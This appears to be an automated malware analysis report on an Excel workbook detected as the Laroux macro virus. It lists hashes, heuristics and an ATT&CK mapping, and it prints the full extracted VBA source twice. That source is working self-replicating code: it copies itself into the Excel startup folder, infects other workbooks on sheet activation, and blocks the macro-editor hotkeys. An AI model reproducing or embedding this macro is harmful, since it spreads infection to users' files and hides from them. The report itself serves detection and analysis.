Office (OLE) malware analysis — malicious · d3b5a93d3027e676

MALICIOUS

Office (OLE)

78.5 KB Created: 2004-07-28 03:15:57 Authoring application: Microsoft Excel First seen: 2015-09-30

MD5: 97e0150870330926e87d18015ec70e80 SHA-1: fab79974810f7bf8729faedcf822c719a81f94aa SHA-256: d3b5a93d3027e676e7c0ceae33c3abfe4de03f4bb01b7e48df675a308006c90d

88 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic

The critical ClamAV heuristic and the presence of VBA macros indicate malicious intent. The Auto_Open macro attempts to copy the workbook to the Excel startup path as 'StartUp.xls', establishing persistence. It also sets up event handlers to maintain its presence and potentially execute further actions.

Heuristics 3

ClamAV: Doc.Macro.Laroux-5893719-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Macro.Laroux-5893719-0
VBA macros detected medium 1 related finding OLE_VBA_MACROS

Document contains VBA macro code
Auto_Open macro low OLE_VBA_AUTO

Auto_Open macro
Matched line in script
```
Sub auto_open()
```

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 1567 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	1567 bytes
SHA-256: `e9801bef61dd481a32b4da851c61331e9e6c79fb13eeeca6f8304240cb334267`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "StartUp" Sub auto_open() On Error Resume Next If ThisWorkbook.Path <> Application.StartupPath And Dir(Application.StartupPath & "\" & "StartUp.xls") = "" Then Application.ScreenUpdating = False ThisWorkbook.Sheets("StartUp").Copy ActiveWorkbook.SaveAs (Application.StartupPath & "\" & "StartUp.xls") n$ = ActiveWorkbook.Name ActiveWindow.Visible = False Workbooks("StartUp.xls").Save Workbooks(n$).Close (False) End If Application.OnSheetActivate = "StartUp.xls!acop" Application.OnKey "%{F11}", "StartUp.xls!escape" Application.OnKey "%{F8}", "StartUp.xls!escape" End Sub Sub acop() On Error Resume Next If ActiveWorkbook.Sheets(1).Name <> "StartUp" Then Application.ScreenUpdating = False n$ = ActiveSheet.Name Workbooks("StartUp.xls").Sheets("StartUp").Copy before:=Worksheets(1) Sheets(n$).Select End If End Sub Sub aback() On Error Resume Next Application.OnKey "%{F8}", "StartUp.xls!escape" Application.OnKey "%{F11}", "StartUp.xls!escape" Application.OnSheetActivate = "StartUp.xls!acop" Application.OnTime Now + TimeValue("00:00:01"), "StartUp.xls!acop" Workbooks.Open Application.StartupPath & "\StartUp.xls" End Sub Attribute VB_Name = "ThisWorkbook" Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True

SHA-256: e9801bef61dd481a32b4da851c61331e9e6c79fb13eeeca6f8304240cb334267

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "StartUp"
Sub auto_open()
  On Error Resume Next
  If ThisWorkbook.Path <> Application.StartupPath And Dir(Application.StartupPath & "\" & "StartUp.xls") = "" Then
    Application.ScreenUpdating = False
    ThisWorkbook.Sheets("StartUp").Copy
    ActiveWorkbook.SaveAs (Application.StartupPath & "\" & "StartUp.xls")
    n$ = ActiveWorkbook.Name
    ActiveWindow.Visible = False
    Workbooks("StartUp.xls").Save
    Workbooks(n$).Close (False)
  End If
  Application.OnSheetActivate = "StartUp.xls!acop"
  Application.OnKey "%{F11}", "StartUp.xls!escape"
  Application.OnKey "%{F8}", "StartUp.xls!escape"
End Sub

Sub acop()
  On Error Resume Next
  If ActiveWorkbook.Sheets(1).Name <> "StartUp" Then
    Application.ScreenUpdating = False
    n$ = ActiveSheet.Name
    Workbooks("StartUp.xls").Sheets("StartUp").Copy before:=Worksheets(1)
    Sheets(n$).Select
  End If
End Sub

Sub aback()
  On Error Resume Next
  Application.OnKey "%{F8}", "StartUp.xls!escape"
  Application.OnKey "%{F11}", "StartUp.xls!escape"
  Application.OnSheetActivate = "StartUp.xls!acop"
  Application.OnTime Now + TimeValue("00:00:01"), "StartUp.xls!acop"
  Workbooks.Open Application.StartupPath & "\StartUp.xls"
End Sub


Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Open this report in the interactive analyzer, or submit your own file for analysis.